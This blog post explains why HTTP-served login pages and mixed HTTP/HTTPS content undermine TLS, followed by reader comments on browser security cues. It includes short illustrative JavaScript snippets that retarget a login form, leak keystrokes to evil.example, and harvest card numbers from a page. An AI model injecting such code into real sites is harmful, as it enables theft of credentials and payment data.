TLS and SSL in the real world


Quite a bit has been written about the Secure Sockets Layer (SSL) protocol and its successor Transport Layer Security (TLS), so I won’t cover the protocols in detail here.  The following are good references if you want to get a quick refresher.

Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure.  Unfortunately, relatively few users understand what security guarantees these protocols provide.  Fewer still understand the critical importance of digital certificates to secure connections.  In a recent phishing attack, the bad guy used a third-party SSL-hosting server to display the lock icon for his fake banking site.  Was the connection secure?  Sure.  Was it safe?  Of course not. 

Improving the user experience around TLS/SSL is a significant challenge: how much can we help the user stay safe without having to explain all this mumbo-jumbo?  Or should we instead try to explain public key cryptography, symmetric key exchange, digital certificates, the role of certification authorities, and more? 

All the average user wants to know is: “Will my transaction be safe?”

Here we run into Law of Security #10: Technology is not a panacea, and TLS/SSL alone can’t answer the user’s question. 

It’s easy to fall into the trap of assuming that spoofing fraud only occurs on the web, but there are plenty of “real-world” attacks that work essentially the same way.  Examples range from a cashier using a hacked terminal to swipe your credit card, to the ambitious crooks who deployed a phony ATM in a shopping mall to collect card numbers and PIN codes.  When was the last time you looked at your ATM and asked it for some ID?

Just because there are no simple solutions doesn’t mean we’re not working hard on making surfing more Trustworthy, and TLS/SSL will be a part of that.   We’re doing some interesting work here, which I’ll be able to blog about at a later date. 

For now, I’d like to point out that security is only as strong as its weakest link.  To that end, I want to highlight two very common web-developer mistakes when building TLS/SSL web applications.

Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).

Most web developers know that HTTPS is comparatively expensive: the multistage handshake, with its multiple round trips and cryptographic operations, is inherently slower than straight HTTP.  A few years ago, someone got the bright idea that login pages should be served via HTTP to reduce this performance hit. 

The thinking goes something like: “Well, since the HTTP POST containing the user’s credentials is sent via HTTPS, any man-in-the-middle can’t see the data.” 

And this seemed like a reasonable idea.  The practice became even more popular as banks and credit card companies decided that customers should be able to log in directly from the HTTP-delivered homepage.  Three of my financial institutions offer this “convenience”.  One of them even draws little lock icons near the login box and provides a phone number customers can call to be reassured that it’s safe.

There are two problems with this practice: one fairly obvious, and one slightly less obvious.  The first problem is simple: How does the user know that the form is being submitted via HTTPS?  Most browsers have no such UI cue.  (Pretty much everyone turns off the “Warn when sending unencrypted form data” option within 2 minutes of installing the browser.)  Even supposing there were a UI cue that the form was targeted at a HTTPS page, how could the user know that it was going to the right HTTPS page?  If the login form was delivered via HTTP, there’s no guarantee it hasn’t been changed between the server and the client.  A bad guy sitting on the wire between the two could simply retarget the POST to submit to a HTTPS site that he controls.  Oops. 
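To make the retargeting concrete, here’s a hypothetical sketch.  The host names and the `retargetLoginForm` helper are invented for illustration; a real man-in-the-middle would perform an equivalent rewrite on the raw HTTP response as it passes by on the wire:

```javascript
// Hypothetical sketch: a man-in-the-middle who can rewrite the
// HTTP-delivered login page needs only a trivial transform to
// retarget the form.  All names below are invented.
function retargetLoginForm(html, attackerUrl) {
  // Swap the legitimate HTTPS action for one the attacker controls.
  return html.replace(/action="https:\/\/[^"]*"/, 'action="' + attackerUrl + '"');
}

var original = '<form action="https://login.bank.example/auth" method="post">';
var rewritten = retargetLoginForm(original, "https://evil.example/auth");
console.log(rewritten);
```

Note that the browser really does submit over HTTPS afterwards; it’s just HTTPS to the wrong server, and nothing on the HTTP-delivered page lets the user detect the swap.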

Think that’s bad?  There’s an even more sneaky attack the bad guy could execute.  The event model in HTML is pretty rich, and one of the things it can do is listen for keystroke events.  So, the bad guy could simply rewrite the login page HTML to leak keystrokes to a server he controls, every time a key is pressed.  Unsecured login form + Man-in-the-Middle + 5 lines of JScript + Server-side keystroke collector = Bad News.  
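Those few lines of script need nothing exotic.  A hypothetical sketch of the payload follows; the collector host (evil.example) and the helper name are invented, and in the rewritten page the attacker would wire this up as a keypress handler and fire each URL as an image-request beacon:

```javascript
// Hypothetical sketch of a keystroke-leaking payload a man-in-the-middle
// could splice into an HTTP-delivered login page.  The collector host
// (evil.example) is invented for illustration.
function leakKeystroke(key) {
  // In a browser, setting new Image().src = url silently fires a GET
  // request that the attacker's server logs -- one request per keystroke.
  var url = "https://evil.example/collect?k=" + encodeURIComponent(key);
  return url;
}

// In the rewritten page the attacker would attach it like so:
//   document.addEventListener("keypress", function (e) { leakKeystroke(e.key); });
console.log(leakKeystroke("p"));
```

The victim never sees anything: no navigation, no prompt, just a stream of tiny image requests carrying the password one character at a time.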

(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)

Critical Mistake #2: Mixing HTTP Content into a HTTPS page

Some HTTPS pages pull in assorted resources over HTTP, which leads to the annoying “This page contains both secure and nonsecure items” prompt.  Why does this hassle exist?  Is it really so bad if some files get pulled down via HTTP, if the main body of my page is delivered via HTTPS?

The answer is, of course, yes, this is a bad thing.  For one thing, it’s impossible for the user to tell what parts of the page were delivered securely, and what parts were not.  And worse, if a man-in-the-middle can rewrite the HTTP traffic, he can, for instance, rewrite the HTTPS page using standard DHTML.  Or, he can scan the page for any information of interest (e.g. a credit card number) and POST that data to a server he controls.  Using HTTP-delivered resources on a HTTPS-delivered page pokes holes in your secure channel.  Don’t do it.
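As a sketch of that second attack: with control of even one HTTP-delivered script, the bad guy can scan the rendered page for anything that looks like a card number.  The function below is invented for illustration (the crude regex included); in a browser it would be run over `document.body.innerText`, with the results beaconed or POSTed to the attacker’s server:

```javascript
// Hypothetical sketch: the heart of a card-number harvester that a
// man-in-the-middle could substitute for any HTTP-delivered script
// included on an HTTPS page.  The regex is deliberately crude.
function findCardNumbers(pageText) {
  // Runs of 13-16 digits, optionally separated by spaces or dashes.
  var matches = pageText.match(/\b(?:\d[ -]?){13,16}\b/g) || [];
  // Strip the separators so the harvested numbers are uniform.
  return matches.map(function (m) { return m.replace(/[ -]/g, ""); });
}

console.log(findCardNumbers("Card on file: 4111 1111 1111 1111"));
// The attacker would then ship the results off to a server he controls.
```

The point isn’t the regex; it’s that one insecure script grants full read access to everything the “secure” page displays.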

What can we do today?

I hope you will join me in calling on operators of insecure HTTPS sites to correct these mistakes. 

In the short term, you may be able to work around these security holes:

  • If available, a “Login securely” link might lead to an HTTPS login form you can use instead of the form on the HTTP page.  Or try visiting the https:// version of the site directly.
  • If prompted to download mixed content, always choose “No”.

Thought for the week

The so-called “browser wars” have fundamentally changed.  It’s no longer Microsoft vs. Mozilla vs. Opera et al.  Now it’s the “good guys” vs. the “bad guys.”  The “bad guys” are the phishers, malware distributors, and other miscellaneous crooks looking for a quick score at the expense of the browsing public. 

We’re all in this together.

-Eric Lawrence

edit: refer to the blog post titled SSL, TLS and a little Active X: How IE7 Strikes a Balance Between Security and Compatibility for updated behavior


Comments (47)

  1. Anonymous says:

    Great article. It is a shame that there is little protection for the novice internet user against phishing, whatever browser they are using, especially with social scams such as the use of international domain names to spoof proper domains.

  2. brantgurga says:

    What are some examples of browsers you are referencing with your food for thought? The only browsers I know that run JavaScript in the UI are Mozilla-derivatives and there was an issue along those lines disclosed recently that affects them, but such issues I found are reportedly fixed in the latest Firefox release.

  3. Anonymous says:

    This is a great article.

    My bank used to offer the ‘convenient’ way to log in, but thankfully they have since replaced the login form with a big button which takes you to a secure login page. I hope more banks and sites will follow.

    I think it would be nice if this article were published on MSDN, so that a developer working on a bank website could go to a manager and show that Microsoft recommends not putting a login form on a non-secure page. [Of course, this is for the managers who don’t have a clue… and they are in the majority! :(]

    JD

  4. Anonymous says:

    "The first problem is simple: How does the user know that the form is being submitted via HTTPS? Most browsers have no such UI cue."

    The alert box is disabled because it is intrusive and gets in the user’s way even for legitimate submissions. What if the UI cue were to change the actual submit button in some way? It could include a lock icon or be colored yellow, while still using the OS-style button instead of a roll-your-own-style one. These UI cues for HTTPS forms would be helpful and wouldn’t get in the way of either type of transaction; they would merely inform and let the user make the call.

  5. Anonymous says:

    One of the features I like most about Opera is that on a SSL secured site it displays the company name that owns the SSL certificate in the address bar so you can tell if it is who it should be. And it’s unobtrusive.

  6. Anonymous says:

    "(Food for thought: The keystroke-sniffing attack gets even worse if your JS can run in the browser chrome, a feature offered by some browsers.)"

    How is that different from a browser helper object in IE which of course has access to DHTML events?

  7. Anonymous says:

    Chris Griego,

    Because such visual cues as you describe inside the content area of the browser can be easily spoofed.

  8. Anonymous says:

    Nice article, you brought up some points I hadn’t really thought about before, namely the fact that a form that’s being sent unsecured to a client could be modified by a man-in-the-middle attack.

    However, if I was the attacker, and I was able to perform a man-in-the-middle attack on requests between the client and server, I would take advantage of the fact that most users just type "www.mybank.com" into their browser instead of the full "https://www.mybank.com". So right there, since the initial request is unsecured, I’d just modify the link to the secured login page and point it somewhere else… like to my own ‘secured login page’, which is similar to the point you made about modifying an unsecured form POST target.

  9. Anonymous says:

    <<How is that different from a browser helper object in IE which of course has access to DHTML events?>>

    It’s essentially no different at all.

    The general point is that enabling powerful browser extensions without introducing privacy/security holes is hard– Regardless of whether or not you’re using native code or script.

  10. Anonymous says:

    You said: ‘Happily, a majority of web users now know to look for the lock icon and the HTTPS in the address line to identify when their connection is secure.’

    You say a majority of users but I don’t believe this. The majority of users that I see in my line of work as IT administrator do not have a clue. In all I deal with about 200-250 people from work, friends and family, and only about 7 of those could be classed as ‘Masters of the web’, being able to surf with the confidence of not being defrauded or catching a virus. The majority of the people are beginners, or blind-surfers. They just open up the browser and surf. They do not have a clue. My colleague and I are slowly teaching them but it is a slooowww process. Out of everybody I would only say about a 1/4 (quarter) would know how to identify a secure page.

  11. Anonymous says:

    Critical Mistake #1: Non-HTTPS Login pages (even if submitting to a HTTPS page).

    You’re absolutely correct.

    Why are there plenty of such pages for logging in to Passport on the MSN site, then?

  12. Anonymous says:

    Eric, this is a very useful and informative article! More like this please…

  13. Anonymous says:

    Nice article, thanks a lot 😉

  14. Anonymous says:

    I found this very informative and interesting.

    Provides some food for thought.

  15. Anonymous says:

    At the end of a post on SSL/TLS and just how much security a "secure" site really gives you, Eric Lawrence of IEBlog posted an interesting thought:

    The so-called "browser wars" have fundamentally changed. It’s no longer Microsoft vs. Mozilla vs. Op…

  16. Anonymous says:

    <<You say a majority of users [know to look for the lock] but I don’t believe this.>>

    My statement was a bit ambiguous, so I should clarify.

    In usability testing, when we ask users "Do you think this page is secure?", a majority of users do know to look for the lock and/or the HTTPS.

    That doesn’t mean, however, that 50%+ of web users are ~routinely~ looking for the lock as they surf around the web.

    I suspect you’re correct in noting that many many users give no regular thought to the security of their web transactions.

    The percentage who do take note of SSL will probably continue to gradually increase, particularly as more and more news about Internet-based scams makes the mainstream press.

  17. Anonymous says:

    Even the passport.net site itself uses an http login page when you click the login buttons….

  18. Anonymous says:

    IMHO I believe IE should split the "Warn when sending unencrypted form data" warning into 2 separate types: non-critical forms that submit data, and forms that submit username/password data.

    While there’s no perfect way, I would actually prefer this model, as it would allow non-essential data to be sent to a non-encrypted source, but I never want username/login data sent to a non-encrypted source.

    On a side note, what happens if a (hacked) secure page submits data to a non secure source?

    As a coder, and off the top of my head, I would categorize a form as containing essential data if any input name had "user, username, uname, pass, password, passwd" in it, or if the processing URL had "login" anywhere in the filename or folder name.

    I know this is a weak model at best, but a weak model is better than no model.

  19. Anonymous says:

    Also I would like to add that I totally disagree that the average user knows to look for the KEY icon in the browser.

    Maybe the average technical user, but I would bet a month’s salary 95% of web users don’t know that the key icon is even there.

    IE needs a stronger visual cue to show that a page is encrypted, and more importantly, a cue that can’t disappear by going View > Status Bar.

    I can’t give a sane, easy answer for this one, as anything I can quickly think up is a bit distracting. The best I can come up with, and I’m not even sure if it’s a good idea, is that a form, if encrypted and submitting to an encrypted URL, gets a box drawn around it when the user focuses any of its input boxes, with a lock icon in one corner of the box.

    Obviously the graphic of this box shouldn’t be easily reproducible via CSS/JS, but considering where CSS2/CSS3 is going, pretty much anything is possible now.

  20. Anonymous says:

    "IE needs a stronger visual cue to show that a page is encrypted, and more importantly, a cue that can’t dissappear by going View > Status Bar."

    Exactly what I was going to suggest. Hunting around for that tiny little lock and obscure "s" in https is something even I forget to do, or ignore completely. That said, we don’t need a pop up dialog or anything that would go from one extreme to the other.

  21. Anonymous says:

    If the status bar is a bad idea, how about modify the frame around a web page? Unsecure sites would be normal, but you could have say a red or gold ring around a site that is completely secure. A mixed environment could have a completely different color, like half red half gold to say that part of it is secure, but because it’s mixed the red says stop.

    Of course I don’t know how particularly easy this is, but it should be something that is easy to notice and can’t be taken away by View > Status Bar. I do think that what we have has been sufficient so far, but take it a little step further for those of us not quite fortunate enough to remember the umpteen steps we need to make sure a connection is secure. (It’s not umpteen, but it’s definitely not one, and it seems to be getting more complex, not less.)

  22. Anonymous says:

    Jeremy: Unfortunately, that’s easily spoofed, with something like:

    body { border: 2px solid red; }

    in your CSS file.

  23. Anonymous says:

    Regarding the "This page contains both secure and nonsecure content":

    If you dynamically push Internet Explorer a PDF as a result of a POST via https, you get this warning (even though the resulting page and everything associated with it is being requested over https).

    Please fix this. The fix you’ve already provided:

    http://support.microsoft.com/?kbid=321532

    requires a web server to send Accept-Ranges: bytes in the header, which isn’t a requirement of HTTP/1.1:

    http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

    "Origin servers that accept byte-range requests MAY send

    Accept-Ranges: bytes

    but are not required to do so."

    If you really stand behind your article, you would help correct the problem of IE incorrectly showing this message when being sent a PDF file as a result of a POST.

  24. Anonymous says:

    <<If you dynamically push Internet Explorer a PDF as a result of a POST via https, you get this warning >>

    Have you installed the v7.0 PDF reader? I believe this issue was resolved.

  25. Anonymous says:

    Shouldn’t there be some kind of indication as to which parts of the page were loaded via a non-secure protocol and which over HTTPS when loading mixed content? Something like a red box around a non-secure graphic, or a description of which parts of the page were non-secure in the "information bar" of IE? Most of the time these are innocuous third-party tracking scripts.

  26. Anonymous says:

    I wasn’t referring to a section that can be spoofed by CSS. Body refers to what is INSIDE the frame. The frame consists of the toolbar up top, a middle "body" (lack of a better word), and the status bar below. The space in between the status and toolbars would be the ideal real estate with an area that is not affected by CSS or code of any kind. Since the lock isn’t affected by code, this area shouldn’t be as well.

    This makes perfect sense when you think about tabbed browsing. The tab is the body, or what can be changed by CSS. The area around the tab (tab control, I think in Windows controls) would be where you’d put this color so that the border of the tab control would be what changes, not the body, not anything that can be touched by CSS or any markup language.

    Say this was in place and someone actually tried to spoof it. You’d have a red ring with a red ring inside of it. The outer ring would be what matters, but I could see someone being confused by that. So I’ll give another suggestion: opacity + color coding. There could be a barely visible background color that changes based upon what type of site it is. Or you could simply have a "watermark" of a lock for completely secure, an open lock for mixed, and no lock if it’s not secure.

    You honestly can’t develop something initially that can’t be spoofed by CSS or HTML; it’s just too powerful in the browser. You have to take the bits that you do deem as "locked" out of reach so that no one can spoof them. It’s the nature of HTML as a markup language to allow that kind of flexibility. HTML doesn’t care about what is on the screen; it just wants it to be formatted correctly. What is on the screen is the part that is exploited for phishing and other scams to be successful. There’s definitely a Catch-22 involved, if just a little one.

  27. Anonymous says:

    I don’t buy it. Not that you’re wrong; you’re quite right. The problem is that we assume the attacker can arbitrarily get at the http stream and modify it. Assuming that capability, I ask you how the user gets to the https login page… likely from an http page… so that link is vulnerable to rewriting to a different server. For that matter, the user never even gets to your homepage; they go straight to an imposter site.

    This is assuming that the user doesn’t, by themselves, unprompted, type in https://www.yoursite.com. If you link to it anywhere, then there’s a vulnerable link in the chain. And very few businesses are going to accept requiring customers to type in the URL, remembering the https. I’d venture to say none.

    I think it’s safer to just say the whole https security model is nothing but window dressing anyway, so I’d hardly call these pieces critical mistakes. It’s too confusing for the casual user to figure all of this out, so they punt, either by not participating or by not worrying about it. Not sure what the fix is.

  28. Anonymous says:

    <<Something like a red box around a non-secure graphic, or a description of which parts of the page were non-secure in the "information bar" of IE? Most of the times these are innocuous, thirdparty tracking scripts>>

    That’s precisely the point: It’s never innocuous to deliver a script on a HTTPS page via HTTP. Script can completely rewrite the page using the DOM, so it’s not really possible to highlight which part of the page isn’t secure.

  29. Anonymous says:

    "The so-called ‘browser wars’ have undamentally changed… Now it’s the ‘good guys’ vs. the ‘bad guys.’"

    Actually, it’s always been the ‘good guys’ vs. the ‘bad guys’; only now Microsoft has decided it wants to be one of the good guys. We’re still seeing how that’s going to work out, because it seems that MSN Search favors IIS hosts (http://www.ivor.it/goog/big1000/). If that doesn’t fall under ‘looking for a quick score at the expense of the browsing public’, I don’t know what does. History has shown that Microsoft thinks nothing of poisoning its relationship with the internet community, and that continues to be the case.

  30. Anonymous says:

    With regards to "Mixed content" error:

    It makes sense to display such a warning if a page includes insecure content that may contain damaging client script. That would include <script> <object> and <applet>, perhaps <link> (CSS), and perhaps <frame> and <iframe> (see below).

    It does *NOT* make sense to display such a message for pages that include insecure images <img>. Why would you want to pull a bunch of GIFs and JPEGs thru SSL? That causes completely unnecessary server load and client slowness (especially because SSL-served images generally won’t get cached).

    Not displaying the error message for insecure <img> URLs is a simple fix.

    Perhaps better than an error message would be to refuse loading the dangerous tags <script> <object> <applet> if not served via SSL (on the same domain).

    Frames <frame> <iframe> can be sandboxed (a feature added to HTAs in IE 6.0), such that they can’t get access to the containing document.

  31. Anonymous says:

    <<RE: http://www.ivor.it/goog/big1000/>>

    Take that tin-foil hat off, friend. MSN & other engines are all about relevancy. It’s well understood that more … let’s call them "random"… sites are hosted by Apache. There are lots of webhosts with 1000 little vanity sites on a single Apache box.

    The same can be done with IIS, of course, but it’s relatively less common.

  32. Anonymous says:

    I disagree regarding images. An insecure image request could get re-routed to a malicious server, serving up images that trigger various overflow bugs in image loading code (of which there have been at least a few in all browsers), and take control of at least the browser.

    If they are ssl, at least you know they haven’t been tampered with on the way, and the original end point is the server that you looked at the cert for and decided to trust.

  33. Anonymous says:

    > (Pretty much everyone turns off the "Warn when sending unencrypted form data" option within 2 minutes of installing the browser.)

    Well DUH!

    What do you think people do when faced with crappy popups? They close them!

    Why did you build the Information Bar into XP SP2 and not use it to display important information like this? Instead you use popups, and those will be turned off by reflex.

    IE team should consult Bill Hill regarding popups. He put it real well in the video interview.

  34. Anonymous says:

    You know what would be nice as well?

    It would be nice if you could somehow extend the SSL/TLS spec to allow operators to relax the need to have unique IPs for each domain. This would allow hosting providers to host multiple certificates on a single web server IP (like non-SSL).

    I mean, is it such a leak that I’m talking to a particular host if I have that IP address?

  35. Anonymous says:

    Several people have asked, if we are worried about malicious manipulation of an insecure server response midstream – what is to stop the same person from inserting their own log-in form on any http page on a web site, and capturing a user’s credentials that way? It seems like this is an unlikely occurrence at best, or an unavoidable security hole at worst…

  36. Anonymous says:

    Re: using a single IP for multiple SSL Host, you want Server Name Indication.

    Look at https://sni.corelands.com/ for more info.

  37. Anonymous says:

    Re: secure notification; Firefox, in addition to the status-bar notification for SSL pages, also colours the address bar and adds a key icon to it. It also places the actual address of the server next to the status-bar key, so a user can look down, think "Oh wait, that doesn’t say paypal.com," and quickly get away.

    This is by far the best solution for this problem I’ve seen, and I’d really like IE7 to introduce something like that.

  38. Anonymous says:

    Online banking websites like Bank of America should use SSL login pages, as non-SSL pages are not secure.

  39. Anonymous says:

    Today, Microsoft released Internet Explorer 7 Beta 2. I recommend you to download it in order to test…

  40. Anonymous says:

    George Ou over at ZDNet has recently been engaged in a one-man crusade (http://blogs.zdnet.com/Ou/?p=226) against banks that let users log in to their on-line banking services directly from front

  41. Anonymous says:

    IE7 was released yesterday. If you’re a web site owner, developer or designer, and find that your site or application is encountering problems, fret not. Here is a list of resources for you: Read the Checklists Download the IE7 Readiness…

  42. Anonymous says:

    IE7 was released yesterday. If you’re a web site owner, developer or designer, and find that your site or application is encountering problems, fret not. Here is a list of resources for you: 1. Checklists 2. Download the IE7…

  43. Anonymous says:

    From now on, we have to test our web applications on another browser version. Source: http://dotnet.csdn.net/n/20061019/96467.html Microsoft IE7 was officially released today. Microsoft has published on its website some notes that developers and web authors should be aware of. Translated as follows: Confirm that in your application…